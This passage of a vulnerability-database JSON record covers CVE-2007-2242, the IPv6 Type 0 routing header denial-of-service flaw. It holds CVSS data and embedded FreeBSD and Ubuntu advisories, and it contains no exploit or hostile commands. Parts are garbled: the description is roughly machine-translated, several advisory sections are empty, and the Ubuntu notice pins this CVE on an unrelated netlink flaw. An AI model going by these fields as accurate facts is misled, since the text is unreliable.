                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:3.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:3.1:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:ietf:ipv6:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:6.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:6.2:stable:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:ietf:ipv6:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Philippe Biondi  biondi@cartel-securite.fr",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2007-2242",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-2242",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-2242",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#267289",
            "trust": 0.8,
            "value": "11.03"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200704-492",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#267289"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The IPv6 protocol allows remote attackers to cause a denial of service via crafted IPv6 type 0 route headers (IPV6_RTHDR_TYPE_0) that create network amplification between two routers.  This vulnerability may allow an attacker to cause a denial-of-service condition. IPv6 Type 0 Routing header contains service disruption (DoS) There is a problem. IPv6 specification (RFC2460) So as an extension header Type 0 Specifies the routing header. this is IPv4 In loose source routing Is similar to IPv6 Nodes are required to process packets with this extension header. But using this feature DoS The possibility of attack is pointed out.Service operation interruption by a third party (DoS) An attack may be carried out. For example, it can be assumed that this attack consumes communication bandwidth. IPv6 protocol implementations are prone to a denial-of-service vulnerability due to a design error. \nThis issue is related to the issue discussed in BID 22210 (Cisco IOS IPv6 Source Routing Remote Memory Corruption Vulnerability). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=============================================================================\nFreeBSD-SA-07:03.ipv6                                       Security Advisory\n                                                          The FreeBSD Project\n\nTopic:          IPv6 Routing Header 0 is dangerous\n\nCategory:       core\nModule:         ipv6\nAnnounced:      2007-04-26\nCredits:        Philippe Biondi, Arnaud Ebalard, Jun-ichiro itojun Hagino\nAffects:        All FreeBSD releases. \nCorrected:      2007-04-24 11:42:42 UTC (RELENG_6, 6.2-STABLE)\n                2007-04-26 23:42:23 UTC (RELENG_6_2, 6.2-RELEASE-p4)\n                2007-04-26 23:41:59 UTC (RELENG_6_1, 6.1-RELEASE-p16)\n                2007-04-24 11:44:23 UTC (RELENG_5, 5.5-STABLE)\n                2007-04-26 23:41:27 UTC (RELENG_5_5, 5.5-RELEASE-p12)\nCVE Name:       CVE-2007-2242\n\nI. \n\nII. \n\nIII. \n\nAn attacker can use vulnerable hosts to \"concentrate\" a denial of service\nattack against a victim host or network; that is, a set of packets sent\nover a period of 30 seconds or more could be constructed such that they\nall arrive at the victim within a period of 1 second or less. \n\nOther attacks may also be possible. \n\nIV.  Workaround\n\nNo workaround is available. \n\nV. \n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the\nRELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the\ncorrection date. \n\n2) To patch your present system:\n\nThe following patches have been verified to apply to FreeBSD 5.5, 6.1,\nand 6.2 systems. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch\n# fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch.asc\n\nb) Apply the patch. \n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile your kernel as described in\n\u003cURL:http://www.FreeBSD.org/handbook/kernelconfig.html\u003e and reboot the\nsystem. \n\nVI.  Correction details\n\nThe following list contains the revision numbers of each file that was\ncorrected in FreeBSD. \n\nBranch                                                           Revision\n  Path\n- -------------------------------------------------------------------------\nRELENG_5\n  src/sys/netinet6/in6.h                                         1.35.2.5\n  src/sys/netinet6/in6_proto.c                                   1.29.2.5\n  src/sys/netinet6/route6.c                                      1.10.4.2\nRELENG_5_5\n  src/UPDATING                                            1.342.2.35.2.12\n  src/sys/conf/newvers.sh                                  1.62.2.21.2.14\n  src/sys/netinet6/in6.h                                     1.35.2.3.2.1\n  src/sys/netinet6/in6_proto.c                               1.29.2.4.2.1\n  src/sys/netinet6/route6.c                                  1.10.4.1.4.1\nRELENG_6\n  src/sys/netinet6/in6.h                                         1.36.2.8\n  src/sys/netinet6/in6_proto.c                                   1.32.2.6\n  src/sys/netinet6/route6.c                                      1.11.2.2\nRELENG_6_2\n  src/UPDATING                                             1.416.2.29.2.7\n  src/sys/conf/newvers.sh                                   1.69.2.13.2.7\n  src/sys/netinet6/in6.h                                     1.36.2.7.2.1\n  src/sys/netinet6/in6_proto.c                               1.32.2.5.2.1\n  src/sys/netinet6/route6.c                                  1.11.2.1.4.1\nRELENG_6_1\n  src/UPDATING                                            1.416.2.22.2.18\n  src/sys/conf/newvers.sh                                  1.69.2.11.2.18\n  src/sys/netinet6/in6.h                                     1.36.2.6.2.1\n  src/sys/netinet6/in6_proto.c                               1.32.2.4.2.1\n  src/sys/netinet6/route6.c                                  1.11.2.1.2.1\n- -------------------------------------------------------------------------\n\nVII. References\n\nhttp://www.secdev.org/conf/IPv6_RH_security-csw07.pdf\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2242\n\nThe latest revision of this advisory is available at\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-07:03.ipv6.asc\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (FreeBSD)\n\niD4DBQFGMTlvFdaIBMps37IRApu3AJYsifWIDLcyxNcMdnkvw4nBqXFoAJ43+IzB\nM5sIdCmLQABByFlbMB2BjQ==\n=OrNf\n-----END PGP SIGNATURE-----\n. =========================================================== \nUbuntu Security Notice USN-486-1              July 17, 2007\nlinux-source-2.6.17 vulnerabilities\nCVE-2006-7203, CVE-2007-0005, CVE-2007-1000, CVE-2007-1353,\nCVE-2007-1861, CVE-2007-2242, CVE-2007-2453, CVE-2007-2525,\nCVE-2007-2875, CVE-2007-2876, CVE-2007-2878\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.10:\n  linux-image-2.6.17-12-386                2.6.17.1-12.39\n  linux-image-2.6.17-12-generic            2.6.17.1-12.39\n  linux-image-2.6.17-12-hppa32             2.6.17.1-12.39\n  linux-image-2.6.17-12-hppa64             2.6.17.1-12.39\n  linux-image-2.6.17-12-itanium            2.6.17.1-12.39\n  linux-image-2.6.17-12-mckinley           2.6.17.1-12.39\n  linux-image-2.6.17-12-powerpc            2.6.17.1-12.39\n  linux-image-2.6.17-12-powerpc-smp        2.6.17.1-12.39\n  linux-image-2.6.17-12-powerpc64-smp      2.6.17.1-12.39\n  linux-image-2.6.17-12-server             2.6.17.1-12.39\n  linux-image-2.6.17-12-server-bigiron     2.6.17.1-12.39\n  linux-image-2.6.17-12-sparc64            2.6.17.1-12.39\n  linux-image-2.6.17-12-sparc64-smp        2.6.17.1-12.39\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the Ubuntu 6.10 kernel updates\nhave been given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. If you\nuse linux-restricted-modules, you have to update that package as well to\nget modules which work with the new kernel version. Unless you manually\nuninstalled the standard kernel metapackages (linux-386, linux-powerpc,\nlinux-amd64-generic, etc), a standard system upgrade will automatically\nperform this as well. \n\nDetails follow:\n\nThe compat_sys_mount function allowed local users to cause a denial of\nservice when mounting a smbfs filesystem in compatibility mode. \n(CVE-2006-7203)\n\nThe Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of\nbuffers passed to read() and write(). A local attacker could exploit\nthis to execute arbitrary code with kernel privileges. (CVE-2007-0005)\n\nDue to a variable handling flaw in the  ipv6_getsockopt_sticky()\nfunction a local attacker could exploit the getsockopt() calls to\nread arbitrary kernel memory. This could disclose sensitive data. \n(CVE-2007-1000)\n\nIlja van Sprundel discovered that Bluetooth setsockopt calls could leak\nkernel memory contents via an uninitialized stack buffer.  A local \nattacker could exploit this flaw to view sensitive kernel information. \n(CVE-2007-1353)\n\nA flaw was discovered in the handling of netlink messages.  Local\nattackers could cause infinite recursion leading to a denial of service. (CVE-2007-2242)\n\nThe random number generator was hashing a subset of the available\nentropy, leading to slightly less random numbers. Additionally, systems\nwithout an entropy source would be seeded with the same inputs at boot\ntime, leading to a repeatable series of random numbers. (CVE-2007-2453)\n\nA flaw was discovered in the PPP over Ethernet implementation.  Local\nattackers could manipulate ioctls and cause kernel memory consumption\nleading to a denial of service. (CVE-2007-2525)\n\nAn integer underflow was discovered in the cpuset filesystem.  If mounted,\nlocal attackers could obtain kernel memory using large file offsets\nwhile reading the tasks file. This could disclose sensitive data. \n(CVE-2007-2875)\n\nVilmos Nebehaj discovered that the SCTP netfilter code did not correctly\nvalidate certain states.  A remote attacker could send a specially\ncrafted packet causing a denial of service. (CVE-2007-2876)\n\nLuca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit\nsystems.  A local attacker could corrupt a kernel_dirent struct and\ncause a denial of service. (CVE-2007-2878)\n\n\nUpdated packages for Ubuntu 6.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39.diff.gz\n      Size/MD5:  2086047 d07f76ec226f706d89a66e0ba3d34d44\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39.dsc\n      Size/MD5:     2321 af3e3fecf1d80a7aca131bde9a871966\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz\n      Size/MD5: 59339565 2e5451201e38e865cbc7b0717fa124a1\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.39_all.deb\n      Size/MD5:  4506664 f3307a7a1115f8a279a7ad52d09b251f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.39_all.deb\n      Size/MD5:  1097522 5d80796fb704894d1e083d7a4ea4dfa8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39_all.deb\n      Size/MD5: 46079376 a53f61537b12be4c1886f2578daad04d\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    28612 0b1c6e3ab9284311bfb96e1dcb812fba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    50502 074faf23893f63cef2aaae18f0bf1bc8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:     2450 56e11b173c9c8dad3a233777d1c412f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    40800 c3f23e9745643e33945c50afcd3d1a51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   113554 98ace1d3b7e9409e5273daaa7b28495c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    44000 323e5cc16b63fd99d133539ddfa2e573\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    54026 2c1a7a6a9036ef0d9d16b82f78e56daa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   189518 10a6605cfc28a6aefd355f1ef716d599\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    40036 41ffb86ffa5d8e12c82c857a1d960b77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   167756 fc36e453103ee9429469260e56697ac5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    60450 9672dfd9f1976cca1db9d9057027c025\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   154560 94fa3f8b54017625b2856e0399450b36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   314682 64afdc80508ad9123b636165fe5ada0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   105986 b9f5813e5daec7a7369e86273902a33e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:  1904480 b352f8bcf7f21620ef27b7ac745bd089\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb\n      Size/MD5:   907094 ffde52fea07954ed03bbc4b151a634ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.39_amd64.deb\n      Size/MD5:   913466 19b6851ea5c16833ac07e737d1637591\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_amd64.deb\n      Size/MD5:  7429356 31cf4ff7a0b942b456abb41effb01e83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb\n      Size/MD5: 23872310 671651c6b5237c4b4f9ce0fd87322f81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.39_amd64.deb\n      Size/MD5: 24446348 54c63b9888616e3dc5181235faec4f7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb\n      Size/MD5:  2339902 6456d0226e101c5ca46568c0ac07dbc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.39_amd64.deb\n      Size/MD5:  2338992 4c5a331da5de8f7bd6e901f40d3065cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_amd64.deb\n      Size/MD5:  1771236 c3dda7fd5856dedfadb6aeb86b1ee26b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    16792 f4e8db0d007fbf12243bfb4f73e11f54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   279160 31ace8b9fd8a5783c00432e80ba83e9b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   256924 6c0102de5f392c6255b42d13f36eae6c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:  1048458 e85815750204baa4e5121565a05b67e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:  2103870 3956e33e4d012431810b6bd043175b06\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   164430 02411ba7631f36224cc35f8e1467bcd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    10506 7e32828a1b360eefa21a2900a1ec07f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    93362 c0689220349c25b4d18561451af090db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    52572 91e1eaf7bc0a1a95deb1e20aa31ee356\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    39814 be7f95804371cf80449ab00ab2b09ef7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    79812 8a5c2917c8e41d88fe4988be3fdf350f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:     6336 44fad8c6ef38c0f4054a89482c23b8b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:     9374 e0be83662c3f41cd923cf04523dec121\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    62718 d582dc41e8dc6f9b4264457c40211e8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   138620 e8b5351aed98cdf9973ad93d132b7905\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   115700 450d8ca2ed5957a321d6c009f3e24847\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    90612 1dc5df5c43ec890f05354ed688cdeb2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:  1286170 5615ec4ce076886b2a0b801c97742102\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    80594 1e611e34d769a2a9311e45b3854f4640\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    13480 4d84bc980757d03a15a41394b1f9a3f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    76264 1de9fdeda144490e5950d96c8d6288a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    36064 0e24439c0e8bc55dd9535faab3ec3b24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   151824 4ef6ee14338003c6bb10427c78c31214\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:    53548 374272c14cf4d906d005a3e607970e58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb\n      Size/MD5:   323418 51ef4685d9324c266635c8a11ebb59ea\n\n  i386 architecture (x86 compatible Intel/AMD)\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    21210 7da843c5002c8ea327ccac6e532e8447\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    23806 1a35e88cc19994aacb7a6b717c639c4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    43876 0f8440080102c2a8a9f5c0f79c6bcdc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    44474 2572438a66d363fcd09cbfa20bb87a6d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   104794 3edc3cc7b75daa93b9fa2a1dd0832b4b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    49408 902b83472a56965fd23558b65848286a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:     2362 40d930bb1dd7fcdc88531537ac867601\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:     2388 35cbbb51e8258c121b3976abaf028ed3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    35308 396422cb15b83177dcc6940df3503a6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    36728 2382993640cdc93dcecb8aa07cb9bb83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    98292 fc5ac72df3f19c0fac45c647e64e6759\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   103506 da1c50087cc38d9e618e0abc50c177c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    38470 9cb694eacd4f35d8428806874930d804\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    39222 8f4f537c7bdf54734b573486d3793928\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    44262 f2558cf0898e04a3fea19c0e89c4ce85\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    44668 62ba6d29e30a08e397bc711c3714c81a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   172752 24357036194451f6e58fa166d5971eeb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   175190 88d8a49796dc3a7c55614825470c64ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    33750 6700b5682e3fe81736b8304b1c71189f\n    